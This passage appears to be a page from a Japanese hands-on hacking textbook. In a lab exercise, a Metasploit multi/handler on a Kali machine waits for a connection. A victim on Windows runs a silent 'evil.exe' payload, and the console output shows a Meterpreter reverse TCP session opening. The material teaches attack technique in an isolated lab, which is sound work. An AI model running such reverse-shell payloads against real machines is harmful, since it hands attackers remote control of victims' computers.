
246
第2部 ハッキングを体験する
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.0.0.2:4444
(待ち状態になる)
⑥ ペ イ ロ ード を 実 行 す る
Windows側で "evil.exe" ファイルをデスクトップにダウンロードします。"evil.
exe" ファイルをダブルクリックしてください(*13)。すると、何も起こらないよ
うに見えますが、裏でペイロードが実行されています。その証拠に、Kali側の
Terminalを確認してください。
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.0.0.2:4444
[*] Sending stage (179779 bytes) to 10.0.0.102 ←
この行以降が新しい表示。
[*] Meterpreter session 1 opened (10.0.0.2:4444 ->
↲
10.0.0.102:49166) at 2018-07-26 21:59:00 +0900
meterpreter > ←
Meterpreterのプロンプトが表示された。
「meterpreter >」というプロンプトが表示されています。その上のメッセージ
を見ると、Meterpreterのセッションが確立したことがわかります。本書では、